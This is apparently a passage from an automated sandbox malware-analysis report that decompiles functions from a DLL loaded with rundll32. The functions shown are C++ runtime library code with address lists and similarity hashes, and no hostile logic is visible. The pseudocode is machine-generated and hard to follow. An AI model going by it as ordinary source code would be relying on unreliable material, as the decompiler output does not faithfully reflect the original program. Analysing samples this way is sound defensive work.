                          0x6e20f70a
                          0x6e20f70a
                          0x6e20f70d
                          0x6e20f711
                          0x6e20f715
                          0x6e20f722
                          0x6e20f72a
                          0x6e20f72c
                          0x00000000
                          0x6e20f72c
                          0x6e20f6f3
                          0x6e20f6f3
                          0x00000000
                          0x6e20f6f3
                          0x6e20f6f1
                          0x6e20f664
                          0x6e20f664
                          0x6e20f667
                          0x6e20f66b
                          0x6e20f66f
                          0x6e20f67c
                          0x6e20f684
                          0x6e20f686
                          0x00000000
                          0x6e20f686
                          0x6e20f64d
                          0x6e20f64d
                          0x00000000
                          0x6e20f64d
                          0x6e20f64b
                          0x6e20f5be
                          0x6e20f5be
                          0x6e20f5c1
                          0x6e20f5c5
                          0x6e20f5c9
                          0x6e20f5d6
                          0x6e20f5de
                          0x6e20f5e0
                          0x00000000
                          0x6e20f5e0
                          0x6e20f5a7
                          0x6e20f5a7
                          0x00000000
                          0x6e20f5a7
                          0x6e20f5a5
                          0x6e20f518
                          0x6e20f518
                          0x6e20f51b
                          0x6e20f51f
                          0x6e20f523
                          0x6e20f530
                          0x6e20f538
                          0x6e20f53a
                          0x00000000
                          0x6e20f53a
                          0x6e20f501
                          0x6e20f501
                          0x00000000
                          0x6e20f501
                          0x6e20f4ff
                          0x6e20f472
                          0x6e20f472
                          0x6e20f475
                          0x6e20f479
                          0x6e20f47d
                          0x6e20f48a
                          0x6e20f492
                          0x6e20f494
                          0x00000000
                          0x6e20f494
                          0x6e20f45b
                          0x6e20f45b
                          0x00000000
                          0x6e20f45b
                          0x6e20f459
                          0x6e20f3cc
                          0x6e20f3cc
                          0x6e20f3cf
                          0x6e20f3d3
                          0x6e20f3d7
                          0x6e20f3e4
                          0x6e20f3ec
                          0x6e20f3ee
                          0x00000000
                          0x6e20f3ee
                          0x6e20f3b5
                          0x6e20f3b5
                          0x00000000
                          0x6e20f3b5
                          0x6e20f3b3

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20F37C
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20F386
                          • int.LIBCPMT ref: 6E20F39D
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • std::_Facet_Register.LIBCPMT ref: 6E20F3D7
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F3F7
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20F415
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                          • String ID: pm,n
                          • API String ID: 651022567-2572091394
                          • Opcode ID: 8a30b9bb76ec5eaa5a37e6aec8e79c23ec760855f3273b040763a584d205b40d
                          • Instruction ID: 4d7e936a3ed2f7f129a1bd50156fb673837000677847a2d41008beb10c35c4f9
                          • Opcode Fuzzy Hash: 8a30b9bb76ec5eaa5a37e6aec8e79c23ec760855f3273b040763a584d205b40d
                          • Instruction Fuzzy Hash: 1811E37590051E8FCF00DBE0C894AEEB77BAF84718F240909E510AB2D0DFB49A45CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E204A80, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 83%
                          			E6E204A80(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t23;
				intOrPtr* _t24;
				intOrPtr* _t57;
				intOrPtr* _t60;
				void* _t61;

				_t44 = __ebx;
				E6E2200AC(0x6e268144, __ebx, __edi, __esi, 0x14);
				E6E206653(_t61 - 0x14, 0);
				 *(_t61 - 4) =  *(_t61 - 4) & 0x00000000;
				_t57 =  *0x6e2dce80; // 0x3562700
				 *((intOrPtr*)(_t61 - 0x10)) = _t57;
				_t23 = E6E1E161C(0x6e2c6b34);
				_t47 =  *((intOrPtr*)(_t61 + 8));
				_t24 = E6E1E171B( *((intOrPtr*)(_t61 + 8)), _t23);
				_t59 = _t24;
				if(_t24 != 0) {
					L5:
					E6E2066BA(_t61 - 0x14);
					return E6E220075(_t59);
				} else {
					if(_t57 == 0) {
						_push( *((intOrPtr*)(_t61 + 8)));
						_push(_t61 - 0x10);
						__eflags = E6E1E18A0(__ebx, _t47, __edx, _t57, _t59) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t61 - 0x20);
							E6E223D74(_t61 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e268192, __ebx, _t57, _t59, 0xc);
							_t60 = E6E204A32(_t44, _t57, _t59, 8);
							 *((intOrPtr*)(_t61 - 0x18)) = _t61 - 0xd;
							 *((intOrPtr*)(_t61 - 0x14)) = _t60;
							__eflags = 0;
							 *(_t61 - 4) = 0;
							 *_t60 = 0;
							 *((intOrPtr*)(_t60 + 4)) = 0;
							 *_t60 = E6E205BFB();
							return E6E220075(_t60);
						} else {
							_t59 =  *((intOrPtr*)(_t61 - 0x10));
							 *((intOrPtr*)(_t61 - 0x10)) = _t59;
							 *(_t61 - 4) = 1;
							E6E206FD3(__eflags, _t59);
							 *((intOrPtr*)( *_t59 + 4))();
							 *0x6e2dce80 = _t59;
							goto L5;
						}
					} else {
						_t59 = _t57;
						goto L5;
					}
				}
			}








                          0x6e204a80
                          0x6e204a87
                          0x6e204a91
                          0x6e204a96
                          0x6e204a9f
                          0x6e204aa5
                          0x6e204aa8
                          0x6e204aad
                          0x6e204ab1
                          0x6e204ab6
                          0x6e204aba
                          0x6e204af5
                          0x6e204af8
                          0x6e204b04
                          0x6e204abc
                          0x6e204abe
                          0x6e204ac4
                          0x6e204aca
                          0x6e204ad2
                          0x6e204ad5
                          0x6e204b08
                          0x6e204b16
                          0x6e204b1b
                          0x6e204b23
                          0x6e204b2f
                          0x6e204b35
                          0x6e204b38
                          0x6e204b3b
                          0x6e204b3d
                          0x6e204b40
                          0x6e204b42
                          0x6e204b4a
                          0x6e204b53
                          0x6e204ad7
                          0x6e204ad7
                          0x6e204ada
                          0x6e204ade
                          0x6e204ae2
                          0x6e204aec
                          0x6e204aef
                          0x00000000
                          0x6e204aef
                          0x6e204ac0
                          0x6e204ac0
                          0x00000000
                          0x6e204ac0
                          0x6e204abe

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E204A87
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E204A91
                          • int.LIBCPMT ref: 6E204AA8
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • std::_Facet_Register.LIBCPMT ref: 6E204AE2
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E204AF8
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E204B16
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                          • String ID: 4k,n
                          • API String ID: 651022567-2310321114
                          • Opcode ID: fd993dd31e729741fb0ed1f16ed0c38dafbb1994221349c2cae0aa3e911a7adf
                          • Instruction ID: 00ec10d4d1f6f95a13ce8117a06ad8c9da69bf17027057e75645471f1ee739ee
                          • Opcode Fuzzy Hash: fd993dd31e729741fb0ed1f16ed0c38dafbb1994221349c2cae0aa3e911a7adf
                          • Instruction Fuzzy Hash: 0011E176E0052E9BCF00DBE0C894AEDB77BBF54715F144A18E510AB2D0DBB49A45CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E24E506, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 76%
                          			E6E24E506(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int _v56;
				char _v276;
				short _v278;
				short _v280;
				char _v448;
				signed int _v452;
				signed int _v456;
				short _v458;
				intOrPtr _v460;
				intOrPtr _v464;
				signed int _v468;
				signed int _v472;
				intOrPtr _v508;
				char _v536;
				signed int _v540;
				intOrPtr _v544;
				signed int _v556;
				char _v708;
				signed int _v712;
				signed int _v716;
				short _v718;
				signed int* _v720;
				signed int _v724;
				signed int _v728;
				signed int _v732;
				signed int* _v736;
				signed int _v740;
				signed int _v744;
				signed int _v748;
				signed int _v752;
				char _v820;
				char _v1248;
				char _v1256;
				intOrPtr _v1276;
				signed int _v1292;
				signed int _t243;
				void* _t246;
				signed int _t249;
				signed int _t251;
				signed int _t257;
				signed int _t258;
				signed int _t259;
				signed int _t260;
				signed int _t261;
				signed int _t263;
				signed int _t265;
				void* _t267;
				signed int _t268;
				signed int _t269;
				signed int _t270;
				signed int _t272;
				signed int _t275;
				signed int _t282;
				signed int _t283;
				signed int _t284;
				intOrPtr _t285;
				signed int _t288;
				signed int _t292;
				signed int _t293;
				intOrPtr* _t295;
				intOrPtr _t296;
				signed int _t299;
				signed int _t300;
				signed int _t302;
				signed int _t322;
				signed int _t323;
				signed int _t326;
				signed int _t331;
				void* _t333;
				signed int _t335;
				void* _t336;
				intOrPtr _t337;
				signed int _t342;
				signed int _t343;
				intOrPtr* _t346;
				signed int _t360;
				signed int _t362;
				signed int _t364;
				intOrPtr* _t365;
				signed int _t367;
				signed int _t373;
				intOrPtr* _t377;
				intOrPtr* _t380;
				void* _t383;
				signed int _t384;
				intOrPtr* _t385;
				signed int _t398;
				signed int _t401;
				intOrPtr* _t402;
				signed int _t404;
				signed int* _t408;
				intOrPtr* _t415;
				intOrPtr* _t416;
				intOrPtr _t425;
				signed int _t426;
				short _t427;
				signed int _t430;
				intOrPtr _t431;
				signed int _t434;
				intOrPtr _t435;
				signed int _t437;
				signed int _t440;
				intOrPtr _t446;
				signed int _t447;
				void* _t448;
				signed int _t449;
				signed int _t450;
				signed int _t453;
				signed int _t455;
				void* _t456;
				signed int _t459;
				signed int* _t460;
				intOrPtr* _t461;
				short _t462;
				void* _t464;
				signed int _t466;
				signed int _t468;
				void* _t470;
				void* _t471;
				void* _t473;
				signed int _t474;
				void* _t475;
				void* _t477;
				signed int _t478;
				void* _t480;
				void* _t482;
				intOrPtr _t494;

				_t425 = __edx;
				_t464 = _t470;
				_t471 = _t470 - 0xc;
				_push(__ebx);
				_push(__esi);
				_v12 = 1;
				_t360 = E6E24F26D(__ecx, 0x6a6);
				_t242 = 0;
				_pop(_t373);
				if(_t360 == 0) {
					L20:
					return _t242;
				} else {
					_push(__edi);
					_t2 = _t360 + 4; // 0x4
					_t430 = _t2;
					 *_t430 = 0;
					 *_t360 = 1;
					_t446 = _a4;
					_t4 = _t446 + 0x30; // 0x6e24da4e
					_t243 = _t4;
					_push( *_t243);
					_v16 = _t243;
					_push(0x6e270f34);
					_push( *0x6e270dec);
					E6E24E445(_t360, _t373, _t430, _t446, _t430, 0x351, 3);
					_t473 = _t471 + 0x18;
					_v8 = 0x6e270dec;
					while(1) {
						L2:
						_t246 = E6E25D470(_t430, 0x351, 0x6e270f30);
						_t474 = _t473 + 0xc;
						if(_t246 != 0) {
							break;
						} else {
							_t8 = _v16 + 0x10; // 0x10
							_t415 = _t8;
							_t342 =  *_v16;
							_v16 = _t415;
							_t416 =  *_t415;
							goto L4;
						}
						while(1) {
							L4:
							_t425 =  *_t342;
							if(_t425 !=  *_t416) {
								break;
							}
							if(_t425 == 0) {
								L8:
								_t343 = 0;
							} else {
								_t425 =  *((intOrPtr*)(_t342 + 2));
								if(_t425 !=  *((intOrPtr*)(_t416 + 2))) {
									break;
								} else {
									_t342 = _t342 + 4;
									_t416 = _t416 + 4;
									if(_t425 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							asm("sbb eax, eax");
							_t373 = _v8 + 0xc;
							_v8 = _t373;
							_v12 = _v12 &  !( ~_t343);
							_t346 = _v16;
							_v16 = _t346;
							_push( *_t346);
							_push(0x6e270f34);
							_push( *_t373);
							E6E24E445(_t360, _t373, _t430, _t446, _t430, 0x351, 3);
							_t473 = _t474 + 0x18;
							if(_v8 < 0x6e270e1c) {
								goto L2;
							} else {
								if(_v12 != 0) {
									E6E24CBD3(_t360);
									_t31 = _t446 + 0x28; // 0x10468b00
									_t437 = _t430 | 0xffffffff;
									__eflags =  *_t31;
									if(__eflags != 0) {
										asm("lock xadd [ecx], eax");
										if(__eflags == 0) {
											_t32 = _t446 + 0x28; // 0x10468b00
											E6E24CBD3( *_t32);
										}
									}
									_t33 = _t446 + 0x24; // 0x3b8e8
									__eflags =  *_t33;
									if( *_t33 != 0) {
										asm("lock xadd [eax], edi");
										__eflags = _t437 == 1;
										if(_t437 == 1) {
											_t34 = _t446 + 0x24; // 0x3b8e8
											E6E24CBD3( *_t34);
										}
									}
									 *(_t446 + 0x24) = 0;
									 *(_t446 + 0x1c) = 0;
									 *(_t446 + 0x28) = 0;
									 *((intOrPtr*)(_t446 + 0x20)) = 0;
									_t39 = _t446 + 0x40; // 0x18914c4
									_t242 =  *_t39;
								} else {
									_t20 = _t446 + 0x28; // 0x10468b00
									_t440 = _t430 | 0xffffffff;
									_t494 =  *_t20;
									if(_t494 != 0) {
										asm("lock xadd [ecx], eax");
										if(_t494 == 0) {
											_t21 = _t446 + 0x28; // 0x10468b00
											E6E24CBD3( *_t21);
										}
									}
									_t22 = _t446 + 0x24; // 0x3b8e8
									if( *_t22 != 0) {
										asm("lock xadd [eax], edi");
										if(_t440 == 1) {
											_t23 = _t446 + 0x24; // 0x3b8e8
											E6E24CBD3( *_t23);
										}
									}
									 *(_t446 + 0x24) =  *(_t446 + 0x24) & 0x00000000;
									_t26 = _t360 + 4; // 0x4
									_t242 = _t26;
									 *(_t446 + 0x1c) =  *(_t446 + 0x1c) & 0x00000000;
									 *(_t446 + 0x28) = _t360;
									 *((intOrPtr*)(_t446 + 0x20)) = _t242;
								}
								goto L20;
							}
							goto L131;
						}
						asm("sbb eax, eax");
						_t343 = _t342 | 0x00000001;
						__eflags = _t343;
						goto L10;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E6E242188();
					asm("int3");
					_push(_t464);
					_t466 = _t474;
					_t475 = _t474 - 0x1d0;
					_t249 =  *0x6e2c506c; // 0x5cc08226
					_v56 = _t249 ^ _t466;
					_t251 = _v40;
					_push(_t360);
					_push(_t446);
					_t447 = _v36;
					_push(_t430);
					_t431 = _v44;
					_v508 = _t431;
					__eflags = _t251;
					if(_t251 == 0) {
						_v456 = 1;
						_v468 = 0;
						_t362 = 0;
						_v452 = 0;
						__eflags = _t447;
						if(__eflags == 0) {
							L80:
							E6E24E506(_t362, _t373, _t425, _t431, _t447, __eflags, _t431);
							goto L81;
						} else {
							__eflags =  *_t447 - 0x4c;
							if( *_t447 != 0x4c) {
								L59:
								_t257 = E6E24DE92(_t362, _t425, _t431, _t447, _t447,  &_v276, 0x83,  &_v448, 0x55, 0);
								_t477 = _t475 + 0x18;
								__eflags = _t257;
								if(_t257 != 0) {
									_t373 = 0;
									__eflags = 0;
									_t76 = _t431 + 0x20; // 0x6e24da3e
									_t426 = _t76;
									_t449 = 0;
									_v452 = _t426;
									do {
										__eflags = _t449;
										if(_t449 == 0) {
											L74:
											_t258 = _v456;
										} else {
											_t377 =  *_t426;
											_t259 =  &_v276;
											while(1) {
												__eflags =  *_t259 -  *_t377;
												_t431 = _v464;
												if( *_t259 !=  *_t377) {
													break;
												}
												__eflags =  *_t259;
												if( *_t259 == 0) {
													L67:
													_t373 = 0;
													_t260 = 0;
												} else {
													_t427 =  *((intOrPtr*)(_t259 + 2));
													__eflags = _t427 -  *((intOrPtr*)(_t377 + 2));
													_v458 = _t427;
													_t426 = _v452;
													if(_t427 !=  *((intOrPtr*)(_t377 + 2))) {
														break;
													} else {
														_t259 = _t259 + 4;
														_t377 = _t377 + 4;
														__eflags = _v458;
														if(_v458 != 0) {
															continue;
														} else {
															goto L67;
														}
													}
												}
												L69:
												__eflags = _t260;
												if(_t260 == 0) {
													_t362 = _t362 + 1;
													__eflags = _t362;
													goto L74;
												} else {
													_t261 =  &_v276;
													_push(_t261);
													_push(_t449);
													_push(_t431);
													L84();
													_t426 = _v452;
													_t477 = _t477 + 0xc;
													__eflags = _t261;
													if(_t261 == 0) {
														_t373 = 0;
														_t258 = 0;
														_v456 = 0;
													} else {
														_t362 = _t362 + 1;
														_t373 = 0;
														goto L74;
													}
												}
												goto L75;
											}
											asm("sbb eax, eax");
											_t260 = _t259 | 0x00000001;
											_t373 = 0;
											__eflags = 0;
											goto L69;
										}
										L75:
										_t449 = _t449 + 1;
										_t426 = _t426 + 0x10;
										_v452 = _t426;
										__eflags = _t449 - 5;
									} while (_t449 <= 5);
									__eflags = _t258;
									if(__eflags != 0) {
										goto L80;
									} else {
										__eflags = _t362;
										goto L78;
									}
								}
								goto L81;
							} else {
								__eflags =  *(_t447 + 2) - 0x43;
								if( *(_t447 + 2) != 0x43) {
									goto L59;
								} else {
									__eflags =  *((short*)(_t447 + 4)) - 0x5f;
									if( *((short*)(_t447 + 4)) != 0x5f) {
										goto L59;
									} else {
										while(1) {
											_t263 = E6E25D60D(_t447, 0x6e270f28);
											_t364 = _t263;
											_v472 = _t364;
											_pop(_t379);
											__eflags = _t364;
											if(_t364 == 0) {
												break;
											}
											_t265 = _t263 - _t447;
											__eflags = _t265;
											_v456 = _t265 >> 1;
											if(_t265 == 0) {
												break;
											} else {
												_t267 = 0x3b;
												__eflags =  *_t364 - _t267;
												if( *_t364 == _t267) {
													break;
												} else {
													_t434 = _v456;
													_t365 = 0x6e270dec;
													_v460 = 1;
													do {
														_t268 = E6E24ABBA( *_t365, _t447, _t434);
														_t475 = _t475 + 0xc;
														__eflags = _t268;
														if(_t268 != 0) {
															goto L46;
														} else {
															_t380 =  *_t365;
															_t425 = _t380 + 2;
															do {
																_t337 =  *_t380;
																_t380 = _t380 + 2;
																__eflags = _t337 - _v468;
															} while (_t337 != _v468);
															_t379 = _t380 - _t425 >> 1;
															__eflags = _t434 - _t380 - _t425 >> 1;
															if(_t434 != _t380 - _t425 >> 1) {
																goto L46;
															}
														}
														break;
														L46:
														_v460 = _v460 + 1;
														_t365 = _t365 + 0xc;
														__eflags = _t365 - 0x6e270e1c;
													} while (_t365 <= 0x6e270e1c);
													_t362 = _v472 + 2;
													_t269 = E6E25D5BD(_t379, _t362, 0x6e270f30);
													_t431 = _v464;
													_t450 = _t269;
													_pop(_t383);
													__eflags = _t450;
													if(_t450 != 0) {
														L49:
														__eflags = _v460 - 5;
														if(_v460 > 5) {
															_t270 = _v452;
															goto L55;
														} else {
															_push(_t450);
															_t272 = E6E25D5B2(_t383,  &_v276, 0x83, _t362);
															_t478 = _t475 + 0x10;
															__eflags = _t272;
															if(_t272 != 0) {
																L83:
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																E6E242188();
																asm("int3");
																_push(_t466);
																_t468 = _t478;
																_t275 =  *0x6e2c506c; // 0x5cc08226
																_v556 = _t275 ^ _t468;
																_push(_t362);
																_t367 = _v540;
																_push(_t450);
																_push(_t431);
																_t435 = _v544;
																_v1292 = _t367;
																_v1276 = E6E24D5FF(_t367, _t383, _t425) + 0x278;
																_t282 = E6E24DE92(_t367, _t425, _t435, _v536, _v536,  &_v820, 0x83,  &_v1248, 0x55,  &_v1256);
																_t480 = _t478 - 0x2e4 + 0x18;
																__eflags = _t282;
																if(_t282 != 0) {
																	_t101 = _t367 + 2; // 0x6
																	_t453 = _t101 << 4;
																	__eflags = _t453;
																	_t283 =  &_v280;
																	_v724 = _t453;
																	_t428 =  *(_t453 + _t435);
																	_t384 =  *(_t453 + _t435);
																	while(1) {
																		_v712 = _v712 & 0x00000000;
																		__eflags =  *_t283 -  *_t384;
																		_t455 = _v724;
																		if( *_t283 !=  *_t384) {
																			break;
																		}
																		__eflags =  *_t283;
																		if( *_t283 == 0) {
																			L93:
																			_t284 = _v712;
																		} else {
																			_t462 =  *((intOrPtr*)(_t283 + 2));
																			__eflags = _t462 -  *((intOrPtr*)(_t384 + 2));
																			_v718 = _t462;
																			_t455 = _v724;
																			if(_t462 !=  *((intOrPtr*)(_t384 + 2))) {
																				break;
																			} else {
																				_t283 = _t283 + 4;
																				_t384 = _t384 + 4;
																				__eflags = _v718;
																				if(_v718 != 0) {
																					continue;
																				} else {
																					goto L93;
																				}
																			}
																		}
																		L95:
																		__eflags = _t284;
																		if(_t284 != 0) {
																			_t385 =  &_v280;
																			_t428 = _t385 + 2;
																			do {
																				_t285 =  *_t385;
																				_t385 = _t385 + 2;
																				__eflags = _t285 - _v712;
																			} while (_t285 != _v712);
																			_v728 = (_t385 - _t428 >> 1) + 1;
																			_t288 = E6E24F26D(_t385 - _t428 >> 1, 4 + ((_t385 - _t428 >> 1) + 1) * 2);
																			_v740 = _t288;
																			__eflags = _t288;
																			if(_t288 == 0) {
																				goto L86;
																			} else {
																				_v732 =  *((intOrPtr*)(_t455 + _t435));
																				_t125 = _t367 * 4; // 0xe764e850
																				_v744 =  *((intOrPtr*)(_t435 + _t125 + 0xa0));
																				_t128 = _t435 + 8; // 0x8b018b
																				_v748 =  *_t128;
																				_t394 =  &_v280;
																				_v720 = _t288 + 4;
																				_t292 = E6E2491A7(_t288 + 4, _v728,  &_v280);
																				_t482 = _t480 + 0xc;
																				__eflags = _t292;
																				if(_t292 != 0) {
																					_t293 = _v712;
																					_push(_t293);
																					_push(_t293);
																					_push(_t293);
																					_push(_t293);
																					_push(_t293);
																					E6E242188();
																					asm("int3");
																					_t295 =  *0x6e2c76f0; // 0x3576920
																					 *0x6e2c5108 =  *((intOrPtr*)(_t295 + 0x88));
																					 *0x6e2c51c0 =  *_t295;
																					_t296 =  *((intOrPtr*)(_t295 + 4));
																					 *0x6e2c51ec = _t296;
																					return _t296;
																				} else {
																					__eflags = _v280 - 0x43;
																					 *((intOrPtr*)(_t455 + _t435)) = _v720;
																					if(_v280 != 0x43) {
																						L104:
																						_t299 = E6E24DB3B(_t367, _t394, _t435,  &_v708);
																						_t398 = _v712;
																						 *(_t435 + 0xa0 + _t367 * 4) = _t299;
																					} else {
																						__eflags = _v278;
																						if(_v278 != 0) {
																							goto L104;
																						} else {
																							_t398 = _v712;
																							 *(_t435 + 0xa0 + _t367 * 4) = _t398;
																						}
																					}
																					__eflags = _t367 - 2;
																					if(_t367 != 2) {
																						__eflags = _t367 - 1;
																						if(_t367 != 1) {
																							__eflags = _t367 - 5;
																							if(_t367 == 5) {
																								 *((intOrPtr*)(_t435 + 0x14)) = _v716;
																							}
																						} else {
																							 *((intOrPtr*)(_t435 + 0x10)) = _v716;
																						}
																					} else {
																						_t460 = _v736;
																						_t428 = _t398;
																						_t408 = _t460;
																						 *(_t435 + 8) = _v716;
																						_v720 = _t460;
																						_v728 = _t460[8];
																						_v716 = _t460[9];
																						while(1) {
																							_t154 = _t435 + 8; // 0x8b018b
																							__eflags =  *_t154 -  *_t408;
																							if( *_t154 ==  *_t408) {
																								break;
																							}
																							_t461 = _v720;
																							_t428 = _t428 + 1;
																							_t331 =  *_t408;
																							 *_t461 = _v728;
																							_v716 = _t408[1];
																							_t408 = _t461 + 8;
																							 *((intOrPtr*)(_t461 + 4)) = _v716;
																							_t367 = _v752;
																							_t460 = _v736;
																							_v728 = _t331;
																							_v720 = _t408;
																							__eflags = _t428 - 5;
																							if(_t428 < 5) {
																								continue;
																							} else {
																							}
																							L112:
																							__eflags = _t428 - 5;
																							if(__eflags == 0) {
																								_t178 = _t435 + 8; // 0x8b018b
																								_t322 = E6E256102(_t367, _t428, _t435, __eflags, _v712, 1, 0x6e270ea8, 0x7f,  &_v536,  *_t178, 1);
																								_t482 = _t482 + 0x1c;
																								__eflags = _t322;
																								_t323 = _v712;
																								if(_t322 == 0) {
																									_t460[1] = _t323;
																								} else {
																									do {
																										 *(_t468 + _t323 * 2 - 0x20c) =  *(_t468 + _t323 * 2 - 0x20c) & 0x000001ff;
																										_t323 = _t323 + 1;
																										__eflags = _t323 - 0x7f;
																									} while (_t323 < 0x7f);
																									_t326 = E6E221C3C( &_v536,  *0x6e2c51e8, 0xfe);
																									_t482 = _t482 + 0xc;
																									__eflags = _t326;
																									_t460[1] = 0 | _t326 == 0x00000000;
																								}
																								_t193 = _t435 + 8; // 0x8b018b
																								 *_t460 =  *_t193;
																							}
																							 *(_t435 + 0x18) = _t460[1];
																							goto L123;
																						}
																						__eflags = _t428;
																						if(_t428 != 0) {
																							 *_t460 =  *(_t460 + _t428 * 8);
																							_t460[1] =  *(_t460 + 4 + _t428 * 8);
																							 *(_t460 + _t428 * 8) = _v728;
																							 *(_t460 + 4 + _t428 * 8) = _v716;
																						}
																						goto L112;
																					}
																					L123:
																					_t300 = _t367 * 0xc;
																					_t200 = _t300 + 0x6e270de8; // 0x6e20815c
																					 *0x6e26a26c(_t435);
																					_t302 =  *((intOrPtr*)( *_t200))();
																					_t401 = _v732;
																					__eflags = _t302;
																					if(_t302 == 0) {
																						__eflags = _t401 - 0x6e2c52b0;
																						if(_t401 != 0x6e2c52b0) {
																							_t459 = _t367 + _t367;
																							__eflags = _t459;
																							asm("lock xadd [eax], ecx");
																							if(_t459 != 0) {
																								goto L128;
																							} else {
																								_t218 = _t459 * 8; // 0x10468b00
																								E6E24CBD3( *((intOrPtr*)(_t435 + _t218 + 0x28)));
																								_t221 = _t459 * 8; // 0x3b8e8
																								E6E24CBD3( *((intOrPtr*)(_t435 + _t221 + 0x24)));
																								_t224 = _t367 * 4; // 0xe764e850
																								E6E24CBD3( *((intOrPtr*)(_t435 + _t224 + 0xa0)));
																								_t404 = _v712;
																								 *((intOrPtr*)(_v724 + _t435)) = _t404;
																								 *(_t435 + 0xa0 + _t367 * 4) = _t404;
																							}
																						}
																						_t402 = _v740;
																						 *_t402 = 1;
																						 *((intOrPtr*)(_t435 + 0x28 + (_t367 + _t367) * 8)) = _t402;
																					} else {
																						 *(_v724 + _t435) = _t401;
																						_t205 = _t367 * 4; // 0xe764e850
																						E6E24CBD3( *((intOrPtr*)(_t435 + _t205 + 0xa0)));
																						 *(_t435 + 0xa0 + _t367 * 4) = _v744;
																						E6E24CBD3(_v740);
																						 *(_t435 + 8) = _v748;
																						goto L86;
																					}
																					goto L87;
																				}
																			}
																		} else {
																			goto L87;
																		}
																		goto L131;
																	}
																	asm("sbb eax, eax");
																	_t284 = _t283 | 0x00000001;
																	__eflags = _t284;
																	goto L95;
																} else {
																	L86:
																	__eflags = 0;
																	L87:
																	_pop(_t456);
																	__eflags = _v16 ^ _t468;
																	return E6E21F8A5(_v16 ^ _t468, _t428, _t456);
																}
															} else {
																_t333 = _t450 + _t450;
																__eflags = _t333 - 0x106;
																if(_t333 >= 0x106) {
																	E6E2203A9();
																	goto L83;
																} else {
																	 *((short*)(_t466 + _t333 - 0x10c)) = 0;
																	_t335 =  &_v276;
																	_push(_t335);
																	_push(_v460);
																	_push(_t431);
																	L84();
																	_t475 = _t478 + 0xc;
																	__eflags = _t335;
																	_t270 = _v452;
																	if(_t335 != 0) {
																		_t270 = _t270 + 1;
																		_v452 = _t270;
																	}
																	L55:
																	_t447 = _t362 + _t450 * 2;
																	_t373 = 0;
																	__eflags =  *_t447;
																	if( *_t447 == 0) {
																		L57:
																		__eflags = _t270;
																		L78:
																		if(__eflags != 0) {
																			goto L80;
																		} else {
																		}
																		goto L81;
																	} else {
																		_t447 = _t447 + 2;
																		__eflags =  *_t447;
																		if( *_t447 != 0) {
																			continue;
																		} else {
																			goto L57;
																		}
																	}
																}
															}
														}
													} else {
														_t336 = 0x3b;
														__eflags =  *_t362 - _t336;
														if( *_t362 != _t336) {
															break;
														} else {
															goto L49;
														}
													}
												}
											}
											goto L131;
										}
										goto L81;
									}
								}
							}
						}
					} else {
						__eflags = _t447;
						if(_t447 != 0) {
							_push(_t447);
							_push(_t251);
							_push(_t431);
							L84();
						}
						L81:
						_pop(_t448);
						__eflags = _v12 ^ _t466;
						return E6E21F8A5(_v12 ^ _t466, _t425, _t448);
					}
				}
				L131:
			}








































































































































                          0x6e24e506
                          0x6e24e509
                          0x6e24e50b
                          0x6e24e50e
                          0x6e24e50f
                          0x6e24e518
